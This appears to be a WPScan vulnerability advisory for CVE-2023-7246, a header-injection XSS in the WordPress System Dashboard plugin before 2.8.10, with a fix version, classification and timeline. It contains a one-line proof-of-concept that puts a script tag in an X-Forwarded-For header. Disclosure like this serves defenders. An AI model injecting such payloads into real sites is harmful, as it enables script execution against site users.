WordPress Plugin Vulnerabilities

System Dashboard < 2.8.10 - XSS via Header Injection

Description

The plugin does not sanitize and escape some parameters, which could allow administrators in multisite WordPress configurations to perform Cross-Site Scripting attacks

Proof of Concept

X-Forwarded-For: 11.11.11.11<script>alert(1)</script>

Affects Plugins

Plugin icon
system-dashboard
Fixed in 2.8.10

References

CVE
CVE-2023-7246
URL
https://drive.google.com/file/d/1KeplUmWgFgBTbrhHDwumeZbm12LK54eN/view?usp=sharing

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
https://research.cleantalk.org
Verified
Yes
WPVDB ID
7413d5ec-10a7-4cb8-ac1c-4ef554751518

Timeline

Publicly Published
2024-02-28 (about 2 months ago)
Added
2024-02-28 (about 2 months ago)
Last Updated
2024-03-01 (about 1 months ago)

Other

Published
Title
Published
2024-02-01
Title
ProfilePress < 4.14.4 - Contributor+ Stored XSS
Published
2022-05-18
Title
Themify - WooCommerce Product Filter < 1.3.8 - Reflected Cross-Site Scripting
Published
2023-11-03
Title
Apollo13 Framework Extensions < 1.9.1 - Contributor+ Stored XSS
Published
2021-07-24
Title
Email Subscriber <= 1.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
Published
2022-01-10
Title
Cluevo < 1.8.1 - Admin+ Stored Cross Site Scripting